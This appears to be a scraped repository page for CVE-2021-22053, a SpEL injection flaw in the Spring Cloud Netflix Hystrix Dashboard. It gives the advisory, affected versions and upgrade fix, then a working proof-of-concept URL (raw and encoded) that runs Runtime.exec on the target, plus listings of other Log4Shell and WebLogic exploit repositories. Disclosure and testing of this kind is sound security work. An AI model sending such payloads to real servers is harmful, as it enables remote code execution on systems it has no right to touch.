Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053

Related tags

Spring Boot spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
Overview

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability

Severity

High

Vendor

Spring by VMware

Description

Applications using both spring-cloud-netflix-hystrix-dashboard and spring-boot-starter-thymeleaf expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at /hystrix/monitor;[user-provided data], the path elements following hystrix/monitor are being evaluated as SpringEL expressions, which can lead to code execution.

Affected VMware Products and Versions

Severity is high unless otherwise noted.

  • Spring Cloud Netflix
    • 2.2.0.RELEASE to 2.2.9.RELEASE
    • Older, unsupported versions are also affected

Mitigation

Users of affected versions should apply the following mitigation: Users should upgrade to 2.2.10.RELEASE+. No other steps are necessary. Releases that have fixed this issue include:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

Credit

This vulnerability was identified and responsibly reported by threedr3am of SecCoder Security Lab ([email protected]).

References

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

History

2021-11-17: Initial vulnerability report published.

POC

raw:

http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

encode:

http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. The diagonal bar'/' cannot be carried in the command

You might also like...

A simple telemetry dashboard for DiRT Rally 2.0

A simple telemetry dashboard for DiRT Rally 2.0

Telemetry Dashboard for DiRT Rally 2.0 (WIP) Displays Current gear Current speed Steering wheel position Throttle, brake and clutch pedals input Engin

Sep 13, 2022

This project was created as a simple example to show how we can implement the hexagonal architecture(software design) proposed by Netflix.

This project was created as a simple example to show how we can implement the hexagonal architecture(software design) proposed by Netflix.

Netflix Hexagonal Architecture Table of contents About the project Description Built with Installation Requirements to run Usage information Run Licen

Dec 20, 2022

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Jun 10, 2022

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname

Jan 5, 2023

A spring cloud infrastructure provides various of commonly used cloud components and auto-configurations for high project consistency

A spring cloud infrastructure provides various of commonly used cloud components and auto-configurations for high project consistency

A spring cloud infrastructure provides various of commonly used cloud components and auto-configurations for high project consistency.

Feb 8, 2022

CVE-2021-2109 && Weblogic Server RCE via JNDI

CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

Nov 21, 2022

openam-CVE-2021-35464 tomcat 执行命令回显

openam-CVE-2021-35464 tomcat 执行命令回显

openam CVE-2021-35464 tomcat 执行命令回显. 项目基于 ysoserial 和 Java-Rce-Echo 构建项目需要在依赖中加入ysoserial.jar和jato-14.6.3.jar POST /OpenAM/ccversion/Version HTTP/1.1

Dec 15, 2022

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex

Dec 14, 2021

log4j2 Log4Shell CVE-2021-44228 proof of concept

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

Dec 21, 2021
Comments
  • Add gradle-wrapper.jar to repository

    Add gradle-wrapper.jar to repository

    Could you please add the gradle-wrapper.jar also to this repository? For an empirical study I am looking for different vulnerable OS projects to evaluate different sec tools. I would like to include your project, but unfortunately I can't execute the scan commands without the gradle-wrapper.jar file. It seems that it was excluded due to your .gitignore Thank you! :)

    opened by lorriborri 1
Owner
SCSL
SecCoder Security Lab
SCSL
GitHub
This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Immunity, Inc 9 Jun 30, 2022
Vulnerability CVE-2021-44228 checker

CVE-2021-44228 checker This is the repository for checking for vulnerability CVE-2021-44228. This is a PoC that only displays strings without any exte

Yasuhiro Yamada 36 Nov 9, 2022
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process

-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com

Volker Simonis 108 Dec 23, 2021
Spring GraphQL examples using Netflix DGS, GraphQL Java and Spring GraphQL

spring-graphql-sample Spring GraphQL examples using the following frameworks and libraries: Netflix DGS(Domain Graph Service) framework Spring GraphQL

Hantsy Bai 56 Dec 20, 2022
一个涵盖六个专栏:Spring Boot 2.X、Spring Cloud、Spring Cloud Alibaba、Dubbo、分布式消息队列、分布式事务的仓库。希望胖友小手一抖,右上角来个 Star,感恩 1024

友情提示:因为提供了 50000+ 行示例代码,所以艿艿默认注释了所有 Maven Module。 胖友可以根据自己的需要,修改 pom.xml 即可。 一个涵盖六个主流技术栈的正经仓库: 《Spring Boot 专栏》 《Spring Cloud Alibaba 专栏》 《Spring Clou

芋道源码 15.7k Dec 31, 2022
Demo microservice architecture with Spring ,Spring Cloud Gateway , Spring Cloud config server , Eureuka , keycloak and Docker.

spring-microservice Demo microservice architecture with Spring ,Spring Cloud Gateway , Spring Cloud config server , Eureuka , keycloak and Docker. Arc

null 4 Sep 13, 2022
A high availability shopping(ecommerce) system using SpringBoot, Spring Cloud, Eureka Server, Spring Cloud Gateway, resillience4j, Kafka, Redis and MySQL.

High-availability-shopping-system A high availability shopping(ecommerce) system using SpringBoot, Spring Cloud, Eureka Server, Spring Cloud Gateway,

LeiH 1 Oct 26, 2022
GitactionBoard - Ultimate Dashboard for GithubActions.

Gitaction Board Gitaction Board - Ultimate Dashboard for GithubActions. Table of contents Usage Pull docker image Run docker image Configurations UI D

OTTO (GmbH & Co. KG) 43 Dec 2, 2022
The state-of-the-art Dashboard of Apache RoccketMQ provides excellent monitoring capability. Various graphs and statistics of events, performance and system information of clients and application is evidently made available to the user.

RocketMQ Dashboard How To Install With Docker get docker image mvn clean package -Dmaven.test.skip=true docker:build or docker pull apacherocketmq/ro

The Apache Software Foundation 605 Dec 30, 2022
This app brings Privacy dashboard features from Android 12 to older android devices.

PrivacyDashboard This app brings Privacy dashboard features from Android 12 to older android devices. Have you ever thought which apps are accessing y

Rushikesh Kamewar 234 Jan 7, 2023